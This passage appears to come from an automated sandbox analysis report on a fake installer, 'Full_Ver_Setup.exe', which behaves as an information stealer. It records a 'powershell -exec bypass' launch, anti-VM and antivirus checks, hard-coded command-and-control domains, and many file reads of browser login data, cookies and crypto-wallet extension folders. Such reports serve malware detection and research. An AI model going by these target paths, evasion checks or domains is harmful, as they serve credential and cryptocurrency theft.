              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeSection loaded: webio.dllJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
              Source: Full_Ver_Setup.exeStatic file information: File size 74953137 > 1048576

              Data Obfuscation

              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -exec bypass <!DOCTYPE html> <!--[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]--> <!--[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]--> <!--[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]--> <!--[if gt IE 8]><!--> <html class="no-js" lang="en-US"> <!--<![endif]--> <head> <title>Suspected phishing site | Cloudflare</title> <meta charset="UTF-8" /> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <meta http-equiv="X-UA-Compatible" content="IE=Edge" /> <meta name="robots" content="noindex, nofollow" /> <meta name="viewport" content="width=device-width,initial-scale=1" /> <link rel="stylesheet" id="cf_styles-css" href="/cdn-cgi/styles/cf.errors.css" /> <!--[if lt IE 9]><link rel="stylesheet" id='cf_styles-ie-css' href="/cdn-cgi/styles/cf.errors.ie.css" /><![endif]--> <style>body{margin:0;padding:0}</style> <!--[if gte IE 10]><!--> <script> if (!navigator.cookieEnabled) { window.addEventListener('DOMContentLoaded', function () { var cookieEl = document.getElementById('cookie-alert'); cookieEl.style.display = 'block'; }) } </script> <!--<![endif]--> </head> <body> <div id="cf-wrapper"> <div class="cf-alert cf-alert-error cf-cookie-error" id="cookie-alert" data-translate="enable_cookies">Please enable cookies.</div> <div id="cf-error-details" class="cf-error-details-wrapper"> <div class="cf-section cf-wrapper" style="margin-top: 100px;margin-bottom:200px;"> <div class="cf-columns one"> <div class="cf-column"> <h4 class="cf-text-error"><i class="cf-icon-exclamation-sign" style="background-size: 18px; height: 18px; width: 18px; margin-bottom: 2px;"></i> Warning</h4> <h2 style="margin: 16px 0;">Suspected Phishing</h2> <strong>This website has been reported for potential phishing.</strong> <p>Phishing is when a site attempts to steal sensitive 
information by falsely presenting as a safe source.</p> <div style="display: flex; align-items: center;"> <p> <a href="https://www.cloudflare.com/learning/access-management/phishing-attack/" class="cf-btn" style="background-color: #404040; color: #fff; border: 0;">Learn More</a> <form action="/cdn-cgi/phish-bypass" method="GET" enctype="text/plain"> <input type="hidden" name="atok" value="Y0.m3tWOgXwCJmvny1XQKkMDMWzKl6dWzxBD26bzmmI-1734906652-0.0.1.1-/int_clp_ldr_sha.txt"> <button type="submit" class="cf-btn cf-btn-danger" style="color: #bd2426; background: transparent;" data-translate="dismiss_and_enter">Ignore & Proceed</button> </form> </p> </div> <
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exe Code function: 0_2_0323AD96 push eax; mov dword ptr [esp], D1D2D3D4h 0_2_0323ADA4
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exe Code function: 0_2_0323DC36 push eax; mov dword ptr [esp], 060504D3h 0_2_0323DC3B
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_07CF2E8B push FFFFFF8Bh; retf 4_2_07CF2E94
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exe Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX

              Malware Analysis System Evasion

              Source: C:\Users\user\Desktop\Full_Ver_Setup.exe System information queried: FirmwareTableInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2356
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1274
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exe TID: 736 Thread sleep time: -210000s >= -30000s
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exe TID: 2692 Thread sleep time: -30000s >= -30000s
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5688 Thread sleep count: 2356 > 30
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5668 Thread sleep count: 1274 > 30
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1892 Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 564 Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exe Key opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\08070809
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exe Key opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\04070809
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
              Source: Full_Ver_Setup.exe, 00000000.00000003.1873688893.00000000007DD000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW6t
              Source: Full_Ver_Setup.exe, 00000000.00000003.2012907807.0000000003F49000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: e4qemuI
              Source: Full_Ver_Setup.exe, 00000000.00000002.2173229221.00000000007F2000.00000004.00000020.00020000.00000000.sdmp, Full_Ver_Setup.exe, 00000000.00000003.1873688893.00000000007DD000.00000004.00000020.00020000.00000000.sdmp, Full_Ver_Setup.exe, 00000000.00000002.2173229221.0000000000788000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exe Process information queried: ProcessInformation
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exe Code function: 0_2_032003C9 mov edx, dword ptr fs:[00000030h] 0_2_032003C9
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exe Code function: 0_2_03200989 mov eax, dword ptr fs:[00000030h] 0_2_03200989
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exe Code function: 0_2_03200FD8 mov eax, dword ptr fs:[00000030h] 0_2_03200FD8
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exe Code function: 0_2_03200FD9 mov eax, dword ptr fs:[00000030h] 0_2_03200FD9
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exe Code function: 0_2_03200D39 mov eax, dword ptr fs:[00000030h] 0_2_03200D39
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug

              HIPS / PFW / Operating System Protection Evasion

              Source: Full_Ver_Setup.exe String found in binary or memory: rapeflowwj.lat
              Source: Full_Ver_Setup.exe String found in binary or memory: crosshuaht.lat
              Source: Full_Ver_Setup.exe String found in binary or memory: fannleadyn.click
              Source: Full_Ver_Setup.exe String found in binary or memory: discokeyus.lat
              Source: Full_Ver_Setup.exe String found in binary or memory: grannyejh.lat
              Source: Full_Ver_Setup.exe String found in binary or memory: energyaffai.lat
              Source: Full_Ver_Setup.exe String found in binary or memory: necklacebudi.lat
              Source: Full_Ver_Setup.exe String found in binary or memory: sustainskelet.lat
              Source: Full_Ver_Setup.exe String found in binary or memory: aspecteirs.lat
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -exec bypass <!doctype html> <!--[if lt ie 7]> <html class="no-js ie6 oldie" lang="en-us"> <![endif]--> <!--[if ie 7]> <html class="no-js ie7 oldie" lang="en-us"> <![endif]--> <!--[if ie 8]> <html class="no-js ie8 oldie" lang="en-us"> <![endif]--> <!--[if gt ie 8]><!--> <html class="no-js" lang="en-us"> <!--<![endif]--> <head> <title>suspected phishing site | cloudflare</title> <meta charset="utf-8" /> <meta http-equiv="content-type" content="text/html; charset=utf-8" /> <meta http-equiv="x-ua-compatible" content="ie=edge" /> <meta name="robots" content="noindex, nofollow" /> <meta name="viewport" content="width=device-width,initial-scale=1" /> <link rel="stylesheet" id="cf_styles-css" href="/cdn-cgi/styles/cf.errors.css" /> <!--[if lt ie 9]><link rel="stylesheet" id='cf_styles-ie-css' href="/cdn-cgi/styles/cf.errors.ie.css" /><![endif]--> <style>body{margin:0;padding:0}</style> <!--[if gte ie 10]><!--> <script> if (!navigator.cookieenabled) { window.addeventlistener('domcontentloaded', function () { var cookieel = document.getelementbyid('cookie-alert'); cookieel.style.display = 'block'; }) } </script> <!--<![endif]--> </head> <body> <div id="cf-wrapper"> <div class="cf-alert cf-alert-error cf-cookie-error" id="cookie-alert" data-translate="enable_cookies">please enable cookies.</div> <div id="cf-error-details" class="cf-error-details-wrapper"> <div class="cf-section cf-wrapper" style="margin-top: 100px;margin-bottom:200px;"> <div class="cf-columns one"> <div class="cf-column"> <h4 class="cf-text-error"><i class="cf-icon-exclamation-sign" style="background-size: 18px; height: 18px; width: 18px; margin-bottom: 2px;"></i> warning</h4> <h2 style="margin: 16px 0;">suspected phishing</h2> <strong>this website has been reported for potential phishing.</strong> <p>phishing is when a site attempts to steal sensitive information by falsely presenting as a safe source.</p> <div style="display: flex; align-items: center;"> <p> <a href="https://www.cloudflare.com/learning/access-management/phishing-attack/" class="cf-btn" style="background-color: #404040; color: #fff; border: 0;">learn more</a> <form action="/cdn-cgi/phish-bypass" method="get" enctype="text/plain"> <input type="hidden" name="atok" value="y0.m3twogxwcjmvny1xqkkmdmwzkl6dwzxbd26bzmmi-1734906652-0.0.1.1-/int_clp_ldr_sha.txt"> <button type="submit" class="cf-btn cf-btn-danger" style="color: #bd2426; background: transparent;" data-translate="dismiss_and_enter">ignore & proceed</button> </form> </p> </div> <
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exe Queries volume information: C:\ VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
              Source: Full_Ver_Setup.exe, 00000000.00000003.2012801885.0000000000862000.00000004.00000020.00020000.00000000.sdmp, Full_Ver_Setup.exe, 00000000.00000003.1998784204.0000000000862000.00000004.00000020.00020000.00000000.sdmp, Full_Ver_Setup.exe, 00000000.00000003.1998301688.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, Full_Ver_Setup.exe, 00000000.00000003.1998301688.00000000007D5000.00000004.00000020.00020000.00000000.sdmp, Full_Ver_Setup.exe, 00000000.00000003.2012326508.0000000000861000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

              Stealing of Sensitive Information

              Source: Yara match File source: Process Memory Space: Full_Ver_Setup.exe PID: 6476, type: MEMORYSTR
              Source: Yara match File source: 00000000.00000002.2176674766.0000000003200000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: sslproxydump.pcap, type: PCAP
              Source: Yara match File source: decrypted.memstr, type: MEMORYSTR
              Source: Full_Ver_Setup.exe, 00000000.00000002.2174587319.000000000083F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: *electrum*
              Source: Full_Ver_Setup.exe, 00000000.00000003.1992604404.0000000000810000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: %appdata%\ElectronCash\wallets
              Source: Full_Ver_Setup.exe, 00000000.00000003.1992604404.0000000000810000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Wallets/JAXX New Version
              Source: Full_Ver_Setup.exe, 00000000.00000003.1922392393.0000000000832000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: "d":2,"fs":20971520},{"t":0,"p":"%appdata%\\Bitcoin\\wallets","m":["*"],"z":"Wallets/Bitcoin core","d":2,"fs":20971520},{"t":0,"p":"%appdata%\\Binance","m":["app-store.json",".finger-print.fp","simple-storage.json","window-state.json"],"z":"Wallets`e
              Source: Full_Ver_Setup.exe, 00000000.00000003.1992604404.0000000000810000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: %appdata%\Exodus\exodus.wallet
              Source: Full_Ver_Setup.exe, 00000000.00000002.2174587319.000000000083F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: *exodus*
              Source: Full_Ver_Setup.exe, 00000000.00000002.2174587319.000000000083F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: *ethereum*
              Source: Full_Ver_Setup.exe, 00000000.00000003.1971070887.00000000007C6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
              Source: Full_Ver_Setup.exe, 00000000.00000003.1970914700.0000000000839000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: keystore
              Source: Full_Ver_Setup.exe, 00000000.00000003.1922088795.000000000084D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Ledger Live]$
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffffla
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.db
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifd
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqliteJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
              Source: C:\Users\user\Desktop\Full_Ver_Setup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
